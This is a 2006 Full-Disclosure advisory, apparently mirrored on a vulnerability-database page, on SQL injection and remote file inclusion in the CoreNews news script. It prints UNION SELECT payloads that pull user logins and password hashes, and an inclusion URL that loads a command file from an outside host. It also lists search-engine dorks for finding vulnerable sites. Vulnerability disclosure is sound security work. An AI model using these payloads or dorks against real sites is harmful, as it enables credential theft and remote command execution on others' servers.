Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12376
HistoryApr 22, 2006 - 12:00 a.m.

[Full-disclosure] Advisory: CoreNews <= 2.0.1 Multiple Remote Vulnerabilities.

2006-04-2200:00:00
vulners.com
12

–Security Report–
Advisory: CoreNews <= 2.0.1 Multiple Remote Vulnerabilities.

Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI

Date: 21/04/06 21:43 PM

Contacts:{
ICQ: 10072
MSN/Email: [email protected]
Web: http://www.nukedx.com
}

Vendor: CoreNews (http://www.coreslawn.de/&#41;
Version: 2.0.1 and prior versions must be affected.
About: Via this method remote attacker can inject arbitrary SQL queries to
icon_id and userid parameters in preview.php
Also loginned person can easily include arbitrary files and execute command
via CoreNews, because the show parameter in index.php
did not sanitized properly you can found vulnerable code in index.php at line
201.
So it can be easy for remote attacker to login system by using SQL injection
and got users hashed password and load file via
this users account.
Level: Highly Critical

How&Example:
SQL Injection :
Needs MySQL > 4.0
GET -> http://[victim]/[CoreNewsDir]/preview.php?userid=[SQL]
GET -> http://[victim]/[CoreNewsDir]/preview.php?icon_id=[SQL]
GET -> http://[victim]/[CoreNewsDir]/preview.php?userid=[SQL]&icon_id=[SQL]
EXAMPLE ->

http://[victim]/[CoreNewsDir]/preview.php?userid=-1//UNION//SELECT//null,
concat(2022,login,20223,password,2203),null,null,null,null/
/FROM/**/corenews_users/*
EXAMPLE ->

http://[victim]/[CoreNewsDir]/preview.php?icon_id=-1//UNION//SELECT//0,password,login
/
/FROM/**/corenews_users/*
And you can use both SQL example in same time.
with this examples remote attacker can leak speficied users login information
from database.

Remote File Inclusion :
Needs logged in to system and allow_url_fopen set 1 in server configuration.
GET -> http://[victim]/[CoreNewsDir]/?show=[FILE]
EXAMPLE -> http://[victim]/[CoreNewsDir]/?show=http://myhost.com/cmd.txt?

Timeline:

  • 21/04/2006: Vulnerability found.
  • 21/04/2006: Contacted with vendor and waiting reply.

Exploit:
http://www.nukedx.com/?getxpl=24

Dorks: "powered by Corenews 2.0.1" , inurl:/corenews/ , inurl:/corenews2/

Original advisory can be found at: http://www.nukedx.com/?viewdoc=24


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/